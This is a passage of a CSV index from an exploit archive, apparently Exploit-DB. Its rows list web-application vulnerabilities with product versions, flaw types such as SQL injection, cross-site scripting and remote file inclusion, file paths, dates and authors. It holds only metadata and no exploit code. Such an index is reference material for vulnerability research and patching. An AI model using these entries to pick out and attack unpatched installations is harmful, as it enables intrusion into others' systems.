Inclusion",2013-06-05,"CWH Underground",php,webapps, -25973,exploits/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,php,webapps, -25976,exploits/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps, -25977,exploits/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps, -25978,exploits/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 -25981,exploits/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",asp,webapps, -25982,exploits/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps, -25983,exploits/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps, -25984,exploits/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - 'Thread.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps, -25985,exploits/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - 'Search.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps, -25990,exploits/php/webapps/25990.txt,"Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting",2005-07-15,Lostmon,php,webapps, -25994,exploits/php/webapps/25994.txt,"osCommerce 2.2 - 'update.php' Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps, -25995,exploits/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps, -25996,exploits/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps, -25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,php,webapps, -25998,exploits/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps, -26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",java,webapps, -26007,exploits/php/webapps/26007.txt,"PHP Ticket System Beta 1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps, -26293,exploits/php/webapps/26293.txt,"jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection",2005-08-21,krasza,php,webapps, -26294,exploits/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 - 'Password.php' SQL Injection",2005-08-23,retrogod@aliceposta.it,php,webapps, -26295,exploits/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps, -26296,exploits/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps, -26009,exploits/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps, -26012,exploits/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,webapps,80 -26014,exploits/php/webapps/26014.txt,"FForm Sender 1.0 - 'Processform.php3?Name' Cross-Site Scripting",2005-07-19,rgod,php,webapps, -26015,exploits/php/webapps/26015.txt,"Form Sender 1.0 - 'Processform.php3?Failed' Cross-Site Scripting",2005-07-19,rgod,php,webapps, -26016,exploits/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps, -26017,exploits/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps, -26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps, -26019,exploits/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps, -26020,exploits/php/webapps/26020.txt,"Asn Guestbook 1.5 - 'header.php?version' Cross-Site Scripting",2005-07-22,rgod,php,webapps, -26021,exploits/php/webapps/26021.txt,"Asn Guestbook 1.5 - 'footer.php?version' Cross-Site Scripting",2005-07-22,rgod,php,webapps, -26023,exploits/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps, -26025,exploits/php/webapps/26025.txt,"Netquery 3.1 - 'submit.php?portnum' Cross-Site Scripting",2005-07-25,rgod,php,webapps, -26026,exploits/php/webapps/26026.txt,"Netquery 3.1 - 'nqgeoip2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,php,webapps, -26027,exploits/php/webapps/26027.txt,"Netquery 3.1 - 'nqgeoip.php?step' Cross-Site Scripting",2005-07-25,rgod,php,webapps, -26028,exploits/php/webapps/26028.txt,"Netquery 3.1 - 'nqports.php?step' Cross-Site Scripting",2005-07-25,rgod,php,webapps, -26029,exploits/php/webapps/26029.txt,"Netquery 3.1 - 'nqports2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,php,webapps, -26030,exploits/php/webapps/26030.txt,"Netquery 3.1 - 'portlist.php?portnum' Cross-Site Scripting",2005-07-25,rgod,php,webapps, -26031,exploits/php/webapps/26031.txt,"VBZoom Forum 1.11 - 'show.php' SQL Injection",2005-07-26,abducter_minds@yahoo.com,php,webapps, -26033,exploits/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - 'viewcart.asp' Cross-Site Scripting",2005-07-26,Zinho,asp,webapps, -26034,exploits/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - 'Guestbook.php' Cross-Site Scripting",2005-07-26,rgod,php,webapps, -26036,exploits/php/webapps/26036.txt,"PNG Counter 1.0 - 'Demo.php' Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps, -26037,exploits/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps, -26038,exploits/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps, -26039,exploits/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps, -26040,exploits/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps, -26041,exploits/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps, -26042,exploits/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps, -26043,exploits/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps, -26045,exploits/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps, -26046,exploits/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps, -26047,exploits/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps, -26048,exploits/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps, -26049,exploits/php/webapps/26049.txt,"VBZoom 1.0/1.11 - 'profile.php?Username' Cross-Site Scripting",2005-07-29,almaster,php,webapps, -26050,exploits/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php?UserID' Cross-Site Scripting",2005-07-29,almaster,php,webapps, -26051,exploits/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps, -26052,exploits/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"James Bercegay",php,webapps, -26053,exploits/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' SQL Injection",2005-09-30,FalconDeOro,php,webapps, -26054,exploits/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - 'admin.php' Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps, -26055,exploits/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,php,webapps, -26056,exploits/php/webapps/26056.txt,"MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps, -26057,exploits/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps, -26058,exploits/php/webapps/26058.txt,"MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps, -26059,exploits/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps, -26060,exploits/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - 'index.cfm' Cross-Site Scripting",2005-08-01,rUnViRuS,cfm,webapps, -26061,exploits/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,php,webapps, -26062,exploits/php/webapps/26062.txt,"OpenBook 1.2.2 - 'admin.php' SQL Injection",2005-08-01,SVT,php,webapps, -26063,exploits/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - 'Lost_password.php' Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps, -26064,exploits/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - 'Shop_Display_Products.php' SQL Injection",2005-08-02,"John Cobb",php,webapps, -26065,exploits/cfm/webapps/26065.txt,"Fusebox 4.1 - 'index.cfm' Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps, -26066,exploits/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps, -26067,exploits/php/webapps/26067.txt,"Web Content Management - 'validsession.php?strRootpath' Cross-Site Scripting",2005-08-03,rgod,php,webapps, -26068,exploits/php/webapps/26068.txt,"Web Content Management - 'list.php?strTable' Cross-Site Scripting",2005-08-03,rgod,php,webapps, -26069,exploits/asp/webapps/26069.txt,"Naxtor E-directory 1.0 - 'Message.asp' Cross-Site Scripting",2005-08-03,basher13,asp,webapps, -26070,exploits/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - 'default.asp' SQL Injection",2005-08-03,basher13,asp,webapps, -26072,exploits/php/webapps/26072.txt,"PortailPHP 2.4 - 'index.php' SQL Injection",2005-08-04,abducter_minds@yahoo.com,php,webapps, -26073,exploits/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 - Source Code Disclosure",2013-06-10,LiquidWorm,jsp,webapps, -26327,exploits/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php?sitetitle' Cross-Site Scripting",2005-10-07,rgod,php,webapps, -26077,exploits/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps, -26297,exploits/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps, -26298,exploits/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps, -26079,exploits/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,php,webapps, -26080,exploits/php/webapps/26080.txt,"Comdev eCommerce 3.0 - 'WCE.download.php' Directory Traversal",2005-08-05,anonymous,php,webapps, -26081,exploits/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'dwt_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps, -26082,exploits/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps, -26083,exploits/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'sign_in.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps, -26084,exploits/php/webapps/26084.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'archive.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps, -26085,exploits/php/webapps/26085.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps, -26086,exploits/php/webapps/26086.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_linklists.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps, -26087,exploits/php/webapps/26087.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps, -26088,exploits/php/webapps/26088.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'shrimp_petition.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps, -26089,exploits/php/webapps/26089.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - Guestbook File Client IP Disclosure",2005-08-05,Lostmon,php,webapps, -26090,exploits/php/webapps/26090.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - guestbook_ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps, -26091,exploits/php/webapps/26091.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps, -26092,exploits/php/webapps/26092.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - logfile.csv User IP Disclosure",2005-08-05,Lostmon,php,webapps, -26093,exploits/php/webapps/26093.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - formmailer.log User Sent Mail Disclosure",2005-08-05,Lostmon,php,webapps, -26094,exploits/php/webapps/26094.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP Disclosure",2005-08-05,Lostmon,php,webapps, -26095,exploits/php/webapps/26095.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 petitionbook Script - User IP Disclosure",2005-08-05,Lostmon,php,webapps, -26096,exploits/php/webapps/26096.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - suggestions.csv User IP Disclosure",2005-08-05,Lostmon,php,webapps, -26097,exploits/php/webapps/26097.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jnl_records User Database Disclosure",2005-08-05,Lostmon,php,webapps, -26098,exploits/php/webapps/26098.txt,"FlatNuke 2.5.5 - 'structure.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,php,webapps, -26099,exploits/php/webapps/26099.txt,"FlatNuke 2.5.5 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,php,webapps, -26102,exploits/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 - 'messages.php' SQL Injection",2005-08-06,almaster,php,webapps, -26103,exploits/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps, -26104,exploits/php/webapps/26104.html,"Invision Power Board 1.0.3 - Attached File Cross-Site Scripting",2005-08-08,V[i]RuS,php,webapps, -26105,exploits/php/webapps/26105.html,"E107 Website System 0.6 - Attached File Cross-Site Scripting",2005-08-08,edward11,php,webapps, -26106,exploits/php/webapps/26106.txt,"Gravity Board X 1.1 - Login SQL Injection",2005-08-08,rgod,php,webapps, -26107,exploits/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - 'dispbbs.asp?page' Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps, -26108,exploits/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - 'dispuser.asp?name' Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps, -26109,exploits/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - 'boardhelp.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,Lostmon,asp,webapps, -26111,exploits/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps, -26112,exploits/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php?cid' SQL Injection",2005-08-08,almaster,php,webapps, -26113,exploits/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - 'auth.php?cid' SQL Injection",2005-08-08,almaster,php,webapps, -26114,exploits/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - 'Subscribe.php?cid' SQL Injection",2005-08-08,almaster,php,webapps, -26115,exploits/php/webapps/26115.txt,"Calendar Express 2.2 - 'search.php' Cross-Site Scripting",2005-08-08,almaster,php,webapps, -26116,exploits/php/webapps/26116.txt,"Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting",2005-08-08,rgod,php,webapps, -26117,exploits/php/webapps/26117.txt,"FunkBoard 0.66 - 'editpost.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps, -26118,exploits/php/webapps/26118.txt,"FunkBoard 0.66 - 'prefs.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps, -26119,exploits/php/webapps/26119.txt,"FunkBoard 0.66 - 'newtopic.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps, -26120,exploits/php/webapps/26120.txt,"FunkBoard 0.66 - 'reply.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps, -26121,exploits/php/webapps/26121.txt,"FunkBoard 0.66 - 'profile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps, -26122,exploits/php/webapps/26122.txt,"FunkBoard 0.66 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps, -26124,exploits/php/webapps/26124.txt,"WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps, -26125,exploits/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps, -26126,exploits/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps, -26127,exploits/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps, -26129,exploits/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps, -26132,exploits/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps, -26136,exploits/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php?eventid' SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps, -26140,exploits/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps, -26141,exploits/php/webapps/26141.txt,"ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps, -26142,exploits/php/webapps/26142.txt,"ezUpload 2.2 - 'customize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps, -26143,exploits/php/webapps/26143.txt,"ezUpload 2.2 - 'form.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps, -26144,exploits/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php?mid' SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps, -26146,exploits/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 - 'index.php' Cross-Site Scripting",2005-08-10,dyn0,php,webapps, -26147,exploits/php/webapps/26147.txt,"MyBulletinBoard (MyBB) RC4 - 'Username' SQL Injection",2005-08-12,phuket,php,webapps, -26148,exploits/php/webapps/26148.txt,"MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple SQL Injections",2005-08-12,phuket,php,webapps, -26149,exploits/php/webapps/26149.txt,"MyBulletinBoard (MyBB) RC4 - 'polloptions' SQL Injection",2005-08-12,phuket,php,webapps, -26150,exploits/php/webapps/26150.txt,"MyBulletinBoard (MyBB) RC4 - 'action' SQL Injection",2005-08-12,phuket,php,webapps, -26153,exploits/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-16,anonymous,php,webapps, -26154,exploits/asp/webapps/26154.txt,"PersianBlog - 'Userslist.asp' SQL Injection",2005-08-16,trueend5,asp,webapps, -26155,exploits/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps, -26156,exploits/asp/webapps/26156.txt,"CPaint 1.3 - xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",asp,webapps, -26157,exploits/php/webapps/26157.txt,"ECW Shop 6.0.2 - 'index.php' Cross-Site Scripting",2005-08-16,"John Cobb",php,webapps, -26158,exploits/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' HTML Injection",2005-08-16,"John Cobb",php,webapps, -26159,exploits/php/webapps/26159.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple SQL Injections",2005-08-17,h4cky,php,webapps, -26160,exploits/php/webapps/26160.txt,"PHPFreeNews 1.40 - 'NewsCategoryForm.php?NewsMode' Cross-Site Scripting",2005-08-17,h4cky,php,webapps, -26161,exploits/php/webapps/26161.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-17,h4cky,php,webapps, -26162,exploits/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps, -26163,exploits/php/webapps/26163.txt,"PHPTB Topic Board 2.0 - 'board_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps, -26164,exploits/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps, -26165,exploits/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps, -26166,exploits/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps, -26169,exploits/php/webapps/26169.txt,"W-Agora 4.2 - 'Site' Directory Traversal",2005-08-18,matrix_killer,php,webapps, -26170,exploits/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php?course' Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps, -26171,exploits/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - 'Prod.php' Arbitrary Command Execution",2005-08-18,rgod,php,webapps, -26172,exploits/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps, -26174,exploits/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps, -26176,exploits/php/webapps/26176.txt,"Woltlab Burning Board 2.x - 'ModCP.php' SQL Injection",2005-08-20,[R],php,webapps, -26177,exploits/php/webapps/26177.txt,"Land Down Under 800/801 - 'links.php?w' SQL Injection",2005-08-20,bl2k,php,webapps, -26178,exploits/php/webapps/26178.txt,"Land Down Under 800/801 - 'journal.php?m' SQL Injection",2005-08-20,bl2k,php,webapps, -26179,exploits/php/webapps/26179.txt,"Land Down Under 800/801 - 'list.php' Multiple SQL Injections",2005-08-20,bl2k,php,webapps, -26180,exploits/php/webapps/26180.txt,"Land Down Under 800/801 - 'forums.php' Multiple SQL Injections",2005-08-20,bl2k,php,webapps, -26181,exploits/php/webapps/26181.txt,"Land Down Under 800 - 'journal.php?w' Cross-Site Scripting",2005-08-20,bl2k,php,webapps, -26182,exploits/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-20,bl2k,php,webapps, -26183,exploits/php/webapps/26183.txt,"NEPHP 3.0.4 - 'browse.php' Cross-Site Scripting",2005-08-22,bl2k,php,webapps, -26184,exploits/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps, -26186,exploits/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps, -26187,exploits/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module - 'moderate' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps, -26188,exploits/php/webapps/26188.txt,"PostNuke 0.76 RC4b - 'user.php?htmltext' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps, -26189,exploits/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - 'viewdownload.php' SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps, -26190,exploits/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,php,webapps, -26191,exploits/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusions",2005-08-23,rgod,php,webapps, -26192,exploits/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps, -26193,exploits/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps, -26197,exploits/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps, -26199,exploits/php/webapps/26199.txt,"phpMyAdmin 2.x - 'error.php' Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps, -26200,exploits/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps, -26201,exploits/php/webapps/26201.txt,"PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps, -26202,exploits/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps, -26203,exploits/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps, -26204,exploits/php/webapps/26204.pl,"MyBB - 'member.php' SQL Injection",2005-08-29,W7ED,php,webapps, -26205,exploits/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php?c' SQL Injection",2005-08-29,matrix_killer,php,webapps, -26206,exploits/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - 'events.php?c' SQL Injection",2005-08-29,matrix_killer,php,webapps, -26207,exploits/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - 'list.php' Multiple SQL Injections",2005-08-29,matrix_killer,php,webapps, -26208,exploits/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,php,webapps, -26209,exploits/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps, -26211,exploits/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps, -26212,exploits/php/webapps/26212.txt,"FlatNuke 2.5.6 - 'ID' Directory Traversal",2005-08-31,rgod,php,webapps, -26213,exploits/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps, -26215,exploits/php/webapps/26215.txt,"FlatNuke 2.5.6 - 'USR' Cross-Site Scripting",2005-08-31,rgod,php,webapps, -26217,exploits/php/webapps/26217.html,"CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion",2005-08-31,groszynskif,php,webapps, -26223,exploits/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - 'events.php' HTML Injection",2005-09-06,conor.e.buckley,php,webapps, -26224,exploits/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - 'Description' HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps, -26225,exploits/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,php,webapps, -26226,exploits/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps, -26228,exploits/php/webapps/26228.txt,"MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,php,webapps, -26229,exploits/php/webapps/26229.txt,"phpCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,php,webapps, 